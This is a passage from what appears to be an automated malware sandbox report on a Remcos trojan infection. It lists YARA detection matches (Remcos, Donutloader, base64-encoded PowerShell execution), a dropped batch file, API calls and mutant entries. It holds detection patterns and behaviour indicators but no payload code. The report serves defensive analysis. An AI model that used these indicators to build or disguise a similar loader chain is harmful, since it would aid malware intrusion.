              Source: 0000002F.00000002.2705660969.0000000008D1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000025.00000002.2207744918.0000000005C38000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000044.00000002.3579093433.000000000570A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002F.00000002.2567062053.0000000005E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.2768925808.0000000006049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000019.00000002.1954879195.000000000B599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000020.00000002.2046612983.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.1784027157.0000000008C9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002A.00000002.2515947583.000000000942C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002A.00000002.2517437767.000000000BB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000020.00000002.2116165246.0000000008B7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.1754524729.0000000005D0E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002A.00000002.2381301082.0000000006468000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003F.00000002.3285696458.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000014.00000002.1753263642.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000004B.00000002.3916357239.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.3010363046.0000000008EBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000050.00000002.4155888640.0000000005A5D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1616821481.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003A.00000002.3015761795.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000019.00000002.1954330388.0000000008DBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.1787537306.000000000A471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000044.00000002.3628599649.00000000057AA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000019.00000002.1909103811.0000000005F3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000050.00000002.4122586457.0000000005A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000025.00000002.2296515608.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1630733109.000000000B581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.2781991173.00000000060E9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000004B.00000002.3953316191.0000000005F3C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000019.00000002.1906868273.0000000005ED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003A.00000002.3037691114.0000000005CF9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003F.00000002.3306381438.0000000005DE9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.csCryptographic APIs: 'TransformFinalBlock'
              Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.csCryptographic APIs: 'TransformFinalBlock'
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@115/94@3/3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,7_2_004182CE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,9_2_00410DE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,7_2_00418758
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,7_2_00413D4C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,7_2_004148B6
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\dwm.batJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
